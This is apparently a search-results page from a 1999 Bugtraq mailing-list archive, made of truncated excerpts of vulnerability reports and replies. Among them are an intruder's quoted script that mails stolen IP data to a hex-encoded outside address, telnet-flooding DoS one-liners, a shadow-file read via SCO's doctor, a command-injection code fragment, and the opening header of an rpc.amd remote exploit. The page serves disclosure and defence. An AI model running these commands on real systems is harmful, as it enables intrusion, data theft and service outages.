On Wed, 8 Sep 1999, Dylan Griffiths wrote:
>John N Dvorak wrote:
>> Sven,
>>
>> I have verified the following platforms:
>>
>> BSDI 2.1
>> BSDI 3.1
>> BSDI 4.0
>> BSDI 4.0.1
>> Cobalt Linux (MIPS) - RedHat based
>>
>> All vulnerable.
>>
>> I am testing on other Linux platforms, but I presume all
Silvio mistyped the corecr URL for the mailing list, correct follows:
http://virus.beergrave.net/
Cheers.
Outlook Express 5 allows setting the Security Zones in the exact same way:
Tools/Options/Security. So does Outlook 98.
I don't think previous versions allowed it.
--On 9/7/1999, 11:23 AM -0700 David LeBlanc <[EMAIL PROTECTED]> wrote:
> I'm not sure what the variants of Outlook allow in this re
There's been a lot of press recently about Windows 2000 backdoors such as
the NSA key Crypto issue. I've been mulling over another "backdoor" for the
past few days and the more I think about the more cynical I become.
We has Windows 95, then were blessed with 98 and soon Windows 2000
Professional
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Mike and Mike wrote:
> While I think it's immensely useful that your study has debunked
> in hard testing a common myth (that VLANs provide unbeatable
> isolation), the limits of inter-switch VLAN isolation are discussed
> already in Cisco's document
hi,
Sorry for somewhat late reply...
>Why it is not convenient to use the sys_call_table?
>Using the sys_call_table to hook a system call is the 'right way', but it is
>not for a stealth module, because programs like "btrom" can detect that, and
>having the 'System.map' (file that every paranoic
The real problem is defining a "Notification message". Every mail server seems
to define its notification messages differently.
Supposedly notifications come from envelope sender <> so the format shouldn't
matter. But so many systems refuse mail from <> with a notification message of
their own t
By using a combination of problems it is a relatively easy matter for a
local user to gain administrative rights on a Windows NT 4 Server or
Workstation,
though this situation is easily rectifiable.
1) The default configuration permissions on Windows NT allow the Interactive
User,
that is the use
Hi,i found local DoS that Crash telnetd (tested on Slackware 4.0, RH 5.2)
type
telnet localhost | telnet localhost | telnet localhost .. about 50 times
result will be 'Connection Refused' , telnetd crash.
Zo0mer // kpz2000
confirmed to run under 5.0.4 as well.
On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:
> Greetings,
>
>
> INFO:
> There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably
>others. By supplying a doctor script file you can read the first partial line of any
This works against a lot of other stuff too.. Thats the problem with
inetd, unless you use xinetd. It doesn't really support the limiting of
the number of processes that can be open. Its quite easy to fill the
process table if you can make enough of the processes linger around.
Why run ssh from
Greetings,
INFO: There is a local root comprimise in SCO 5.0.5's
/bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file
you can read the first partial line of any file on the system (good enough for
/etc/shadow). Example:
scobox:/bin$ iduid=136(btellier),200(users)sc
> Was this part of a suse installation?
Not part of SuSE 6 (which I use) or 5.2.
> What distro are you running?
didn't he say SuSE?
He probably got hacked some how and the hacker forgot to remove this.
+-- +
| Stuart Harris / Unix systems administr
Hi,
I have found out yet another buffer overflow in ProFTP 1.2.0pre4, which
may or may not be exploitable. I have noticed the authors and other
security related persons a week ago, and I still got no answer, in spite
of my repost.
So either they do not care, either my set up is badly done.
Why
On Sat, 4 Sep 1999, Wietse Venema wrote:
> Whatever reasoning the poster used, it is invalid with any reasonable
> mail system, because it is the mail system that chooses the bounce
> message originator address; the bounce message originator address
> is not under control by the attacker.
>
> In
> On Wed, 1 Sep 1999, Christian Koderer wrote:
> > ./IP | mail `printf
> > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > logout
> > _EOF_
>
>
> In case no one bothered figuring this one out, this translates to
> '[EMAIL PROTECTED]'
>
> Apparently './IP' is a program i
Does this writing to an EXE bypass Anti-Virus protection against programs
that write to EXE's?
How about a less damaging example that writes to say "C:\temp\example.exe"
so we can see what it does safely?
At 21:16 8/30/1999 -0400, SysAdmin Wrote:
>
>ANY Windows 98 file can be overwritten. Peri
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Saturday, September 4, a description of a potential problem with
the WatchGuard Firebox default configuration file was posted to
Bugtraq. At WatchGuard we take this sort of issue very seriously.
When we saw the post, we initiated contact with the p
Cisco Catalyst 2900
I have been able to reproduce this on 2 different Cisco switches. I would
like to know if anyone else has been able to.
Jason Lutz
Original Msg:
To Bugtraq,
We have recently conducted some testing into the security of the
implementation of VLANs on a pair of Cisco Catalys
Actually, there is currently a patch from brian feldman that is being
tested and will be added shortly to the -CURRENT tree for further
testing.. it adds a new login.conf action to limit sbsize.. to give you an
idea.. the sbsize in the mbuf crash is 2 mb.. which is huge.. you can
limit to however
Okay,
I added a link to http://www.sassproductions.com/hacked.htm that allows
you to test the exploit against a specific file. Specifically you need to
copy Reg Edit to the program files folder and give it a whirl. As always, if
you can't figure it out then View Source.
Over and out,
Seth Geo
On Fri, 3 Sep 1999, Alfonso Lazaro wrote:
> Date: Fri, 3 Sep 1999 13:18:02 +0200
> From: Alfonso Lazaro <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: limit maximum nr. of processes.
>
> El dia Wed, Sep 01, 1999 at 10:53:48AM +0200, Petter Wahlman <[EMAIL PROTECTED]>
>escribió:
>
>
Gentleman;
I submitted what I thought was a minor issue on Redhat's handling
of passwords. Is it me? Is it something I missed? Any password you
assign over 8 characters gets cut...
At first I thought it was my system but its not since I tested it at
home,
but then at work its the same thing:
--
patching:
in rc.conf above inetd_flags type -l -R 1024? :)
>Hi,
>
>At the beginning i'd like to excuse all of you if it is commonly well
>known (hmm, i guess it is, but noone patched it ;>.
>
>Both DoS`s use something known as portfuck (e.g. `while true; do telnet
>host port & done`).
>1. If yo
>> >The other
>> >thing is that the default install for NT (especially on HP's) is FAT,
>>
>> Wrong. That could be how that manufacturer sets up _some_ of their
>> machines, but it isn't default for NT install.
>
>Micron and Intergraph also install NT on FAT when they ship it to you.
I can't thi
Hi!
> I had assumed that the whole problem with the vixie-cron exploit was
> that cron allowed users to invoke sendmail with arbitrary command-line
> options *as root*, so dropping SUID status doesn't do any good.
> Sendmail doesn't try to protect the root user from themselves.
I tried it on s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
You can manually download the updates at
http://www.microsoft.com/windows98/downloads/corporate.asp
Personally, I prefer to actually save the update files so that I don't
need to download everything all over again whenever windows breaks and
I have t
On Wed, 01 Sep 1999 18:07:32 PDT, "Free, Bob" <[EMAIL PROTECTED]> said:
> reboot. When the installation is completed after rebooting, these keys are
> cleared and your legal notice is gone.
Having installations that blow away files *intended* for user configuration
is always Very Bad Juju.
> If
>> > Debian has
>> > discovered this bug two years ago and fixed it. Therefore versions in
>> > both, the stable and the unstable, distributions of Debian are not
>> > vulnerable to this problem..
Regardless of which, I was successfully able to take advantage of the
overflow on Debian (GNU/Linu
At 16:44 01.09.99 +0800, [EMAIL PROTECTED] wrote:
[implementation of 802.1q VLANs on Cisco Catalyst 2900 series]
>This has been
>discussed with Cisco and we believe that it is an issue with the
>802.1q specification rather than an implementation issue.
I disagree. IMHO, the root of the matter is
> -Original Message-
> From: 3xT [mailto:[EMAIL PROTECTED]]
> Sent: Monday, August 30, 1999 4:36 PM
>
> Currently most inplementations of Dynamic DNS or "DDNS" rely
> upon only client IP addresses in an access list for
> authentication.
Windows 2000 uses TSIG and Kerberos for update authe
Beleive me, its still there - often... WHy is it left open? mainly because
the INetwork admin who setup the firewall found it too hard to fix - I'd say..
Cheers,
Bret
At 10:51 PM 9/4/99 +1200, Alan Brown wrote:
>On Thu, 2 Sep 1999, Technical Incursion Countermeasures wrote:
>
>> You can do a
- Original Message -
From: Lucky Green <[EMAIL PROTECTED]>
To: cypherpunks@Algebra. COM <[EMAIL PROTECTED]>
Cc: Cryptography@C2. Net <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Friday, September 03, 1999 12:21 AM
Subject: NSA key in MSFT Crypto API
> Perhaps not surprisingly, the debug
At 11:19 AM 9/3/99 +1000, Brad Griffin wrote:
>" I use Eudora Pro and have IE 5 as the default mail viewer (as is the
>default Install) and you crashed Eudora (NT not logged in as
>Administrator). I had to disable IE 5 as the default viewer to see the
>mail..."
>I assume this would have been caus
-BEGIN PGP SIGNED MESSAGE-
On 02-Sep-99 Taneli Huuskonen wrote:
> + snprintf(command, sizeof(command)-1, "mv %s %s 2>&1 >/dev/null" , oldname,
> newname);
>return(system(command));
> }
>
> Without seeing the context, I can't say for sure, but this looks like a
> hole big enough to
Here's what I said about this on another list:
I must admit that this doesn't make much sense to me.
I was at Crypto, but I must have missed the rump session talk in question
(and it's entirely possible that the talk occurred anyway - I was out of the
room for a good deal of that session). In a
dorqus wrote:
> Maybe I'm missing something here...
>
> HOST# uname -a
> SunOS host 5.6 Generic_105181-12 sun4u sparc
you're missing 4 patches - the newest revision is 105181-16.
ok, forgive me.. it's friday afternoon ;)
--
best regards,
gl
_
Grzegorz
"Lancashire, Andrew" wrote:
>
> I don't know if you've ever seen this before. We ran nmap with ICMP
> discover and standard tcp scan. We ran the scan against the entire 10.0.0.0
> network range. Although we were only looking for 2 ports, we found that the
> RSM in our 5500 series (our default ro
On Wed, Sep 01, 1999 at 09:08:55PM +0400, Seva Gluschenko wrote:
> man sendmail:
> /-C
> ...skipping...
> -Cfile Use alternate configuration file. Sendmail refuses to run
> as root if an alternate configuration file is specified.
>
> and it does, for sure %-).
>
> Just tested
Here is the exploit for the AMD vulnerability. You may choose to send the
information via UDP or TCP, or even to bypasse the portmap by specifing
the automount port.
/*
* SDI rpc.AMD automountd remote exploit for RedHat Linux
* Sekure SDI - Brazilian Informa
David LeBlanc writes:
> YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE. Period. End of story.
> What you do with that code is up to you. There is no need to delve into
> the details of just how you steal the lunch money from the end users.
Well, it should be noted that there are things you can
A couple of people have sent me mail asking how to set Outlook 2000 such
that mail comes in under the 'Restricted Sites' zone. Here's how:
select Tools menu, Options item
select security tab
The area you want is in the middle of the page in the section marked
'Secure Content'. Default setting
Hello Seva Gluschenko!
Wed, Sep 01, 1999 at 21:08:55, gvs wrote about "Re: Root shell vixie cron exploit":
MZ> flags, this exploit won't bring anything shocking - simply, it's working
MZ> example.
>
> man sendmail:
> /-C
> ...skipping...
> -Cfile Use alternate configuration file. Send
[EMAIL PROTECTED] wrote:
> >Perhaps I don't see your point. How is this more secure >than StackGuard?
>
> StackGuard protection system has an extremaly grave bug
> with the terminator and null canaries. In certain circumstances (not rare) this bug
>can be exploited
> preventing StackGuard to det
Despite how much I know it might pain some people, if one puts
"http://windowsupdate.microsoft.com" in the "Trusted" zone, then one can
still disable "safe for scripting" controls in the "Internet" zone and get
the convenience of Windows Update without prompting.
(You could still be DNS spoofed.
45 matches
Mail list logo